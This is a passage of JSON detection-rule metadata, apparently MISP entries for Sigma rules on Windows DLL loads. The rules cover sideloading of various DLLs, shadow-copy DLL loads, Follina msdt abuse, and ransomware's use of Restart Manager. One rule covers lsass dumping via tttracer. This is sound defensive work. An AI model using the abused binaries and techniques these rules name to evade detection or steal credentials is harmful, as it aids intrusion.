"https://mobile.twitter.com/0gtweet/status/1564131230941122561", "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_shell_chrome_api.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "value": "DLL Sideloading Of ShellChromeAPI.DLL" }, { "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-14", "falsepositive": [ "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "filename": "image_load_side_load_from_non_system_location.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/", "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", "value": "Potential System DLL Sideloading From Non System Locations" }, { "description": "Detects the image load of vss_ps.dll by uncommon executables", "meta": { "author": "Markus Neis, @markus_neis", "creation_date": "2021-07-07", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_vss_ps_susp_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", "https://twitter.com/am0nsec/status/1412232114980982787", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vss_ps_susp_load.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", "value": "Suspicious Volume Shadow Copy VSS_PS.dll Load" }, { "description": "Detects potential DLL sideloading of \"EACore.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_eacore.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_eacore.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "edd3ddc3-386f-4ba5-9ada-4376b2cfa7b5", "value": "Potential EACore.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"edputil.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-09", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_edputil.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_edputil.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4903324-1a10-4ed3-981b-f6fe3be3a2c2", "value": "Potential Edputil.DLL Sideloading" }, { "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-02", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_vmware_xfer.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmware_xfer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", "value": "Potential DLL Sideloading Via VMware Xfer" }, { "description": "Detects PowerShell core DLL being loaded by an Office Product", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-01", "falsepositive": [ "Unknown" ], "filename": "image_load_office_powershell_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_powershell_dll_load.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "bb2ba6fb-95d4-4a25-89fc-30bb736c021a", "value": "PowerShell Core DLL Loaded Via Office Application" }, { "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", "meta": { "author": "Greg (rule)", "creation_date": "2022-06-17", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_sdiageng_load_by_msdt.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_sdiageng_load_by_msdt.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202", "cve.2022-30190" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec8c4047-fad9-416a-8c81-0f479353d7f6", "value": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE" }, { "description": "Detects potential DLL sideloading of Python DLL files.", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-10-06", "falsepositive": [ "Legitimate software using Python DLLs" ], "filename": "image_load_side_load_python.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/", "https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python", "https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_python.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d36f7c12-14a3-4d48-b6b8-774b9c66f44d", "value": "Potential Python DLL SideLoading" }, { "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", "meta": { "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate usage by software developers/testers" ], "filename": "image_load_dll_tttracer_module_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://twitter.com/mattifestation/status/1196390321783025666", "https://twitter.com/oulusoyum/status/1191329746069655553", "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_tttracer_module_load.yml" ], "tags": [ "attack.defense-evasion", "attack.credential-access", "attack.t1218", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", "value": "Time Travel Debugging Utility Usage - Image" }, { "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-08-17", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_office_dlls.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "value": "Microsoft Office DLL Sideload" }, { "description": "Detects potential DLL sideloading of \"7za.dll\"", "meta": { "author": "X__Junior", "creation_date": "2023-06-09", "falsepositive": [ "Legitimate third party application located in \"AppData\" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed." ], "filename": "image_load_side_load_7za.yml", "level": "low", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_7za.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f6edb78-5c21-42ab-a558-fd2a6fc1fd57", "value": "Potential 7za.DLL Sideloading" }, { "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-10-17", "falsepositive": [ "The command wmic os get lastboottuptime loads vbscript.dll", "The command wmic os get locale loads vbscript.dll", "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" ], "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", "https://twitter.com/dez_/status/986614411711442944", "https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" ], "tags": [ "attack.defense-evasion", "attack.t1220" ] }, "related": [ { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", "value": "WMIC Loading Scripting Libraries" }, { "description": "Detects potential DLL sideloading of \"vivaldi_elf.dll\"", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_vivaldi_elf.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vivaldi_elf.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2092cacb-d77b-4f98-ab0d-32b32f99a054", "value": "Potential Vivaldi_elf.DLL Sideloading" }, { "description": "Detects Kerberos DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Unknown" ], "filename": "image_load_office_kerberos_dll_load.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_kerberos_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", "value": "Active Directory Kerberos DLL Loaded Via Office Application" }, { "description": "Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories).\nUsually this technique is used to achieve UAC bypass or privilege escalation.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), SBousseaden", "creation_date": "2022-12-09", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_non_existent_dlls.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", "https://github.com/Wh04m1001/SysmonEoP", "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b98b92b-4f00-4f62-b4fe-4d1920215771", "value": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders" }, { "description": "Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process.\nThis library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows.\nIt could also be used for anti-analysis purposes by shut downing specific processes.\n", "meta": { "author": "Luc Génaux", "creation_date": "2023-11-28", "falsepositive": [ "Other legitimate Windows processes not currently listed", "Processes related to software installation" ], "filename": "image_load_dll_rstrtmgr_uncommon_load.yml", "level": "low", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/windows-restart-manager-part-1/", "https://www.crowdstrike.com/blog/windows-restart-manager-part-2/", "https://web.archive.org/web/20231221193106/https://www.swascan.com/cactus-ransomware-malware-analysis/", "https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_rstrtmgr_uncommon_load.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1486", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3669afd2-9891-4534-a626-e5cf03810a61", "value": "Load Of RstrtMgr.DLL By An Uncommon Process" }, { "description": "Detects any GAC DLL being loaded by an Office Product", "meta": { "author": "Antonlovesdnb", "creation_date": "2020-02-19", "falsepositive": [ "Legitimate macro usage. Add the appropriate filter according to your environment" ], "filename": "image_load_office_dotnet_gac_dll_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_office_dotnet_gac_dll_load.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", "value": "GAC DLL Loaded Via Office Applications" }, { "description": "Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as \"C:\\Users\\Public\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-17", "falsepositive": [ "Unknown" ], "filename": "image_load_susp_dll_load_system_process.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", "value": "DLL Load By System Process From Suspicious Locations" }, { "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", "meta": { "author": "omkar72, oscd.community", "creation_date": "2020-10-14", "falsepositive": [ "Unknown" ], "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://thewover.github.io/Introducing-Donut/", "https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://github.com/tyranid/DotNetToJScript", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", "value": "DotNet CLR DLL Loaded By Scripting Applications" }, { "description": "Detects potential DLL sideloading of \"SmadHook.dll\", a DLL used by SmadAV antivirus", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-01", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_smadhook.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.qurium.org/alerts/targeted-malware-against-crph/", "https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_smadhook.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24b6cf51-6122-469e-861a-22974e9c1e5b", "value": "Potential SmadHook.DLL Sideloading" }, { "description": "Detects potential DLL sideloading of \"MpSvc.dll\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule." ], "filename": "image_load_side_load_mpsvc.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/entries/microsoft/built-in/mpsvc.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mpsvc.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5ba243e5-8165-4cf7-8c69-e1d3669654c1", "value": "Potential DLL Sideloading Of MpSvc.DLL" }, { "description": "Detects potential DLL sideloading of \"mscorsvc.dll\".", "meta": { "author": "Wietze Beukema", "creation_date": "2024-07-11", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule." ], "filename": "image_load_side_load_mscorsvc.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/entries/microsoft/built-in/mscorsvc.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mscorsvc.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cdb15e19-c2d0-432a-928e-e49c8c60dcf2", "value": "Potential DLL Sideloading Of MsCorSvc.DLL" }, { "description": "Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-07-11", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_abused_dlls_susp_paths.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/", "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_abused_dlls_susp_paths.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "799a5f48-0ac1-4e0f-9152-71d137d48c2a", "value": "Abusable DLL Potential Sideloading From Suspicious Location" }, { "description": "Detects the image load of VSS DLL by uncommon executables", "meta": { "author": "frack113", "creation_date": "2022-10-31", "falsepositive": [ "Unknown" ], "filename": "image_load_dll_vssapi_susp_load.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://github.com/ORCx41/DeleteShadowCopies", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vssapi_susp_load.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1490" ] }, "related": [ { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", "value": "Suspicious Volume Shadow Copy Vssapi.dll Load" }, { "description": "Detects potential DLL sideloading of \"dbghelp.dll\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "creation_date": "2022-10-25", "falsepositive": [ "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], "filename": "image_load_side_load_dbghelp.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://hijacklibs.net/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", "value": "Potential DLL Sideloading Of DBGHELP.DLL" }, { "description": "Detects potential DLL sideloading of \"waveedit.dll\", which is part of the Nero WaveEditor audio editing software.", "meta": { "author": "X__Junior (Nextron Systems)", "creation_date": "2023-06-14", "falsepositive": [ "Unlikely" ], "filename": "image_load_side_load_waveedit.yml", "level": "high", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_waveedit.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "71b31e99-9ad0-47d4-aeb5-c0ca3928eeeb", "value": "Potential Waveedit.DLL Sideloading" }, { "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", "meta": { "author": "frack113", "creation_date": "2022-12-14", "falsepositive": [ "Unknown" ], "filename": "image_load_side_load_jsschhlp.yml", "level": "medium", "logsource.category": "image_load", "logsource.product": "windows", "refs": [ "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/", "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.001", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68654bf0-4412-43d5-bfe8-5eaa393cd939", "value": "Potential DLL Sideloading Via JsSchHlp" }, { "description": "Detects potential DLL side loading of \"KeyScramblerIE.dll\" by \"KeyScrambler.exe\".\nVarious threat actors and malware have been found side loading a masqueraded \"KeyScramblerIE.dll\" through \"KeyScrambler.exe\".\n", "meta": { "author": "Swachchhanda Shrawan Poudel", 